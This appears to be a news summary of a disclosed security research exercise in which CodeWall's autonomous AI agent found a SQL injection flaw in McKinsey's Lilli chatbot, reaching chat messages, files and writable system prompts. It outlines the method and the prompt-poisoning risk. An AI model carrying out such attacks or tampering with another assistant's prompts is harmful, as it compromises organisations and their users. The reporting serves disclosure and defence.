AI Agent Exploits SQL Injection to Compromise McKinsey's Lilli Chatbot
Attack Details and Impact
CodeWall's AI agent targeted McKinsey's generative AI platform Lilli, which processes over 500,000 prompts monthly and is used by 72% of McKinsey's employees (approximately 40,000 people). The agent operated fully autonomously from target research through attack execution and reporting, without any credentials or human input during the process.
Technical Exploitation
The agent discovered 22 publicly exposed API endpoints that didn't require authentication. One endpoint wrote user search queries where JSON keys were concatenated directly into SQL statements, creating a SQL injection vulnerability. The agent recognized this when it found JSON keys reflected verbatim in database error messages - a pattern standard security tools wouldn't flag.
The exploitation was straightforward: "No deployment needed. No code change. Just a single UPDATE statement wrapped in a single HTTP call."
Data Accessed
- 46.5 million chat messages about strategy, mergers and acquisitions, and client engagements (stored in plaintext)
- 728,000 files containing confidential client data
- 57,000 user accounts
- 95 system prompts controlling the AI's behavior (all writable)
Critical Risk
The writable system prompts meant an attacker could have poisoned all responses from Lilli to tens of thousands of consultants, potentially manipulating guardrails, answer generation, and source citations without detection.
Response and Remediation
CodeWall discovered the flaw in late February and disclosed the full attack chain on March 1. By March 2, McKinsey had:
- Patched all unauthenticated endpoints
- Taken the development environment offline
- Blocked public API documentation
McKinsey stated they fixed all issues within hours of notification and found no evidence of unauthorized data access. The company's investigation was supported by a third-party forensics firm.
Broader Implications
This incident demonstrates how AI agents are becoming effective tools for conducting cyberattacks against other AI systems. CodeWall CEO Paul Price noted that while this was a security research exercise, threat actors are increasingly using similar agent technology in real-world attacks, indicating machine-speed intrusions are becoming more common.
📖 Read the full source: HN AI Agents
👀 See Also
Anthropic reveals industrial-scale Claude AI data extraction by Chinese labs
Anthropic confirmed Chinese AI labs used over 24,000 fraudulent accounts to scrape 16 million exchanges from Claude, extracting safety guardrails and logic structures for military and surveillance systems.
Configuring OpenClaw for Encrypted LLM Inference Using TEE Enclaves
A developer shares how they configured OpenClaw to use Onera's AMD SEV-SNP trusted execution environments for end-to-end encrypted LLM inference, including configuration examples and technical tradeoffs.
Sieve: Local Secret Scanner for AI Coding Tool Chat Histories
Sieve scans Cursor, Claude Code, Copilot, and other AI coding assistant chat histories for leaked API keys and tokens. All scanning is local, with redaction and macOS Keychain vault.
Security Checklist for Claude AI-Generated Applications
A developer shares a checklist of common security and operational gaps found in applications built with Claude Code, including rate limiting, authentication flaws, database scaling issues, and input handling vulnerabilities.